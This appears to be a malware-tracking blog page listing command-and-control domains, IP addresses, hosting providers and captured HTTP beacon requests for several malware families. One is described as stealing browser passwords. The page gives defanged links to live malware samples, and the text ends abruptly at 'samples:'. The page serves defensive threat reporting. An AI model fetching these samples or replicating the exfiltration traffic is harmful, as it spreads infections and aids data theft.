malware

icanhazip.com(Malware Using Tor Hosted In United States Matawan Choopa Llc)

Domain :  icanhazip.com 45.32.200.23 Resolved : [ icanhazip.com ] To [45.32.200.23 ] Resolved : [ icanhazip.com ] To [ 104.238.162.182 ] Other ip’s used : 104.238.162.182 76.73.17.194 193.23.244.244 86.59.21.38 46.101.151.222  Opened Listening Ports: 9050   tcp 1028   tcp Executable is spoofed to .mp4. Get it here :  hxxp://www.datafilehost.com/d/5d690b34 Hosting Infos : http://whois.domaintools.com/45.32.200.23

pltd.myjino.ru(HTTP Malware Hosted In Russian Federation Moscow Avguro Technologies Ltd. Hosting Service Provider)

Domain Name : pltd.myjino.ru 81.177.140.144 HTTP Requests : http://pltd.myjino.ru/finsess.php Data : POST /finsess.php HTTP/1.0 Host: pltd.myjino.ru Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Content-Type: application/x-www-form-urlencoded Content-Length: 26 1=1882869218&2=&3=&99=15&^ Get sample here : hxxp://93.95.99.172/0310_crypted.exe Hosting infos : http://whois.domaintools.com/81.177.140.144

damcodes777.cc(HTTP Malware Hosted In Russian Federation Moscow Fast Serv Inc.)

damcodes777.cc 86.105.227.124 URL hxxp://damcodes777.cc/b/connect/2 DATA : POST /b/connect/2 HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0(compatible; MSIE 7.0b; Windows NT 6.0) Host: damcodes777.cc Content-Length: 51 Cache-Control: no-cache cs=aW5zZXJ0&p=Windows+XP+32+HOME&m=3107216218&v=3.0 Hosting Infos : http://whois.domaintools.com/86.105.227.124

upd.upd4ter.com(malware hosted in Spain Madrid Propelin Consulting S.l.u.)

Contacts domains upd.upd4ter.com Contacts server 93.189.33.108:80 In general it steals passwords from browsers and get’s all the informations from the infected machines. GET /installer_stats/?action_id=1003&action_description=Virtual&channel_id=&channel_subid=1&channel_param=0&installer_id=101&installer_version=1.1.9.15182&user_registry=0&user_id=&user_hdd=&user_hdd_volume=&user_mac=&user_mb=&user_bios=&user_os=6.1&user_os_arch=&user_cpu=&user_win_identifier=&process_parent=&user_browsers=&user_default_browser=&user_date=&user_vm=&user_antivirus=s)%20Available.&user_dotnet=&channel=&partner=&aff_id= HTTP/1.1 User-Agent: NSIS_ToolkitOffers (Mozilla) Host: upd.upd4ter.com Cache-Control: no-cache” Sample here Hosting infos http://whois.domaintools.com/93.189.33.108

jdsiwiqweiqwyreqwi.com(Phishing malware hosted in Bosnia And Herzegovina Banja Luka Blicnet D.o.o.)

Domains used by the malware: 34324325kgkgfkgf.com dsffdsk323721372131.com fdshjfsh324332432.com jdsiwiqweiqwyreqwi.com 80.242.123.208 HTTP Requests: URI: http://jdsiwiqweiqwyreqwi.com/dffgbDFGvf465/YYf.php DATA: POST /dffgbDFGvf465/YYf.php HTTP/1.0 Host: jdsiwiqweiqwyreqwi.com Accept: */* Accept-Encoding: identity, *;q=0 Accept-Language: en-US Content-Length: 272 Content-Type: application/octet-stream Connection: close Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) samples: